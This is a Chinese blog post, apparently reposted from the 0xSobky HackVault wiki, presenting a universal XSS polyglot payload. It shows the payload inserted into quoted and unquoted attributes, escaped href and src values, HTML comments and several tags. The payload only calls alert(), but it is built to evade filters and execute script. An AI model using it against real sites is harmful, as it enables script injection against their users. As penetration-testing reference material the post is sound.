前言:

在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了

什么是万能XSS payload:

这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js)

下面我们来看看 payload长什么样子:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

插入到HTML测试

双引号标签:

<input type="text" value="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></input>

单引号标签:

<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>

无引号标签:

<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>

转义绕过(需要点击 触发事件)

<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
  • href  xlink:href和 src 的值会转译 由于是a标签 这里也是需要点击触发:
<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>
<math xlink:href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</math>
<iframe src="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"></iframe>

插入到HTML注释中

<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->

插入到任意标签中

<title>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>

后面测试的太多了 懒得翻了 总结下  这里作者想表达的就是 不管在什么场景下的能够插入到前端任何代码场景并执行 html js 注释中 …… 用它就行了

原地址 :Unleashing an Ultimate XSS Polyglot · 0xSobky/HackVault Wiki · GitHub

终极万能XSS Payload相关推荐

  1. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  2. xss Payload

    来自某牛的网站:http://www.cnblogs.com/b1gstar/p/5783848.html Basic and advanced exploits for XSS proofs and ...

  3. xss payload大全

    刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

  4. 常用 XSS Payload

    (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaS ...

  5. xss payload收集

    打开xss之js,我们随意输入然后查看页内原码. 我们输入tmac 复制全文 我们尝试造成闭合,我们尝试造成闭合,输入x'</script><script>alert(docu ...

  6. 无需括号的xss payload

    兄弟们,事情是这样的,上周五我不是参加公司的新人训练营吗 可是没想到 糟糕的事情发生在了我身上 这件事情严重影响了我这周的学习与工作 你听我慢慢给你讲 由于疫情原因,这次的训练营只能在室内进行,约定的 ...

  7. 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞

    漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...

  8. 跨站脚本攻击(XSS)详解

    XSS简介 XSS(Cross Site Script)攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击. 一开始, ...

  9. 反射型XSS靶场练习

    DVWA靶场 第一关:low 直接一条<script>alert(1)</script>看看结果,很简单直接过关 第二关:Medium 继续接着一条<script> ...

最新文章

  1. 11: facebook原生登录
  2. opencv Remap 图像的映射
  3. pte模拟考试_首考七炸!PTE首战即告捷,拿下爱丁堡大学直通offer
  4. 安装双系统(win10+Ubuntu18.0)使用一段时间后,就直接进入win10,bios启动项里也没有Ubuntu
  5. android在线查看源码工具
  6. MySQL IFNULL函数
  7. ubuntu 环境安装微信
  8. jxls中自定义函数的使用
  9. GIF工具大全(网站)
  10. 常用的linux技巧,Linux Shell常用技巧(十二)-第二部分
  11. 前端~javascript~实战案例:网页表白墙/实战案例:简单实现一个备忘录~
  12. 虚拟机虚拟磁盘文件格式转换
  13. 如何具有更好的凝聚力,我的团队
  14. 网络工程EWM筛选试题
  15. UpdateData()函数的用法
  16. 零输入响应与零状态响应响应
  17. Centos配置阿里云yum源及epel源
  18. 新浪微博开发之授权用户登录的实现
  19. 高响应比优先调度算法
  20. 最新易支付系统源码/二开木呆+商业版的

热门文章

  1. 安全合规/ISO--6--ISO 27001/27017/27018内审项清单
  2. 浪潮NF系列服务器面板状态灯功能及说明
  3. Ecahrts图例后添加百分比和数据
  4. 信息安全保障人员CISAW--- 开班啦
  5. 1333:【例2-2】Blah数集 一本通 队列
  6. python自然对数为底的指数函数_解决python中的幂函数、指数函数问题
  7. 旅行商问题的手工运算及完整代码(TSP)
  8. 备份恢复--图形工具
  9. 杭州python培训机构面授_杭州python学习机构为何要选面授?
  10. excel转mysql 工具_一个简单的批量excel转mysql工具